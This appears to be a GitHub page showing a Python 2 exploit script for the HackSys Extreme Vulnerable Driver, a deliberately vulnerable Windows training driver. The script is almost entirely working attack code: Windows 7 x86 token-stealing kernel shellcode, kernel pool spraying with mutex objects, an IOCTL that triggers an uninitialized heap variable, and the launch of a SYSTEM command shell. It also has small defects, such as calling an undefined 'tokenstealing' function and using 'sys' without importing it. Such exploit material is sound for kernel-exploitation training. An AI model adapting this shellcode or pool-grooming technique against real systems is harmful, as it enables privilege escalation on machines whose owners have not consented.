-
Notifications
You must be signed in to change notification settings - Fork 26
/
Copy pathhacksysUIHEAP.py
176 lines (150 loc) · 4.83 KB
/
hacksysUIHEAP.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
from ctypes import *
from ctypes.wintypes import *
import os
import struct
handles = {}
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
STATUS_SUCCESS = 0
METHOD_NEITHER = 0x3
FILE_ANY_ACCESS = 0x0
FILE_DEVICE_UNKNOWN = 0x00000022
kernel32 = windll.kernel32
ntdll = windll.ntdll
def ctl_code(function,
devicetype = FILE_DEVICE_UNKNOWN,
access = FILE_ANY_ACCESS,
method = METHOD_NEITHER):
"""Recreate CTL_CODE macro to generate driver IOCTL"""
return ((devicetype << 16) | (access << 14) | (function << 2) | method)
def alloc_memory(base_address, input, input_size):
"""
Allocate input buffer
"""
print "[*] Allocating input buffer at %s" % hex(base_address)
base_address_c = c_int(base_address)
input_size_c = c_int(input_size)
ntdll.NtAllocateVirtualMemory.argtypes = [c_int,
POINTER(c_int),
c_ulong,
POINTER(c_int),
c_int,
c_int]
dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF,
byref(base_address_c),
0x0,
byref(input_size_c),
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
print "[-] Error while allocating memory: %s" % dwStatus
getLastError()
sys.exit()
written = c_ulong()
alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, base_address, input, len(input), byref(written))
if alloc == 0:
print "[-] Error while writing our input buffer memory: %s" % alloc
getLastError()
sys.exit()
def tokenstealingx86(RETVAL, extra = ""):
"""
Return a token stealing shellcode
"""
#Windows 7 SP1 x86
KPROCESS = '\x50'
TOKEN = '\xF8'
UPID = '\xB4'
APLINKS = '\xB8'
shellcode = (
"\x60" # pushad
"\x33\xc0" # xor eax,eax
"\x64\x8b\x80\x24\x01\x00\x00" # mov eax,DWORD PTR fs:[eax+0x124]
"\x8b\x40" + KPROCESS + # mov eax,DWORD PTR [eax+_KPROCESS]
"\x8b\xc8" # mov ecx,eax
"\x8b\x80" + APLINKS + "\x00\x00\x00" # mov eax,DWORD PTR [eax+APLINKS]
"\x2d" + APLINKS + "\x00\x00\x00" # sub eax,APLINKS
"\x83\xb8" + UPID + "\x00\x00\x00\x04" # cmp DWORD PTR [eax+UPID],0x4
"\x75\xec" # jne 0xe
"\x8b\x90" + TOKEN + "\x00\x00\x00" # mov edx,DWORD PTR [eax+TOKEN]
"\x89\x91" + TOKEN + "\x00\x00\x00" # mov DWORD PTR [ecx+TOKEN],edx
"\x61" # popad
)
shellcode += extra #append extra code after token stealing shellcode, e.g.: restore stack
if RETVAL == "":
shellcode += "\xc3" #retn
else:
shellcode += "\xc2" + RETVAL + "\x00" # ret 0x8
return shellcode
def spray():
"""Spray the Kernel Pool with mutant name."""
global handles
handles = {}
for i in range(1, 10000):
hHandle = HANDLE(0)
hHandle = kernel32.CreateMutexA(None, False, "\x46" * ((0xF0-10)/2) + str(i).zfill(4))
if hHandle == None:
print "[-] Error while creating mutex"
getLastError()
sys.exit()
handles[i]= hHandle
print "[+] Spray done!"
def make_holes():
global handles
for i in range(1, 10000,16):
kernel32.CloseHandle(handles[i])
handles[i] = None
print "[+] Making holes done!"
def free_all():
#print "[+] Triggering shellcode!"
global handles
for i in range(1, 10000):
if (handles[i] != None):
kernel32.CloseHandle(handles[i])
handles[i] = None
print "[+] Free pool allocations done!"
if __name__ == '__main__':
print "[*] HackSysExtremeVulnerableDriver uninitialized heap variable privilige escalation"
#allocate input, this will be copied to fake object
size = 0x4
input = struct.pack("L", 0xbad0b0b1)
alloc_memory(0x41410000, input, size)
#allocate shellcode in memory
scsize = 0x1000
SHELLCODE = tokenstealing(RETVAL = "")
stuff = "\x90" * 0x100 + SHELLCODE + "\x90" * (scsize - 0x100 - len(SHELLCODE))
alloc_memory(0x00460000, stuff, scsize)
inputbuffer = 0x41410000 #memory address of the input buffer
inputbuffer_size = size
outputbuffer_size = 0x0
IoStatusBlock = c_ulong()
#spray the heap with EventObjects
spray()
#make holes on the heap
make_holes()
DEVICE_NAME = "\\\\.\\HackSysExtremeVulnerableDriver"
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
IOCTL_VULN = ctl_code(0x80c) #HACKSYS_EVD_IOCTL_UNINITIALIZED_HEAP_VARIABLE
if driver_handle:
print "[*] Sending IOCTL and data to the driver..."
dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle,
None,
None,
None,
byref(IoStatusBlock),
IOCTL_VULN,
inputbuffer,
inputbuffer_size,
None,
0x0
)
free_all()
if 'system' in os.popen('whoami').read():
print "[+] Getting system shell..."
os.system("cmd.exe")
else:
print '[-] Failed to elevate privileges'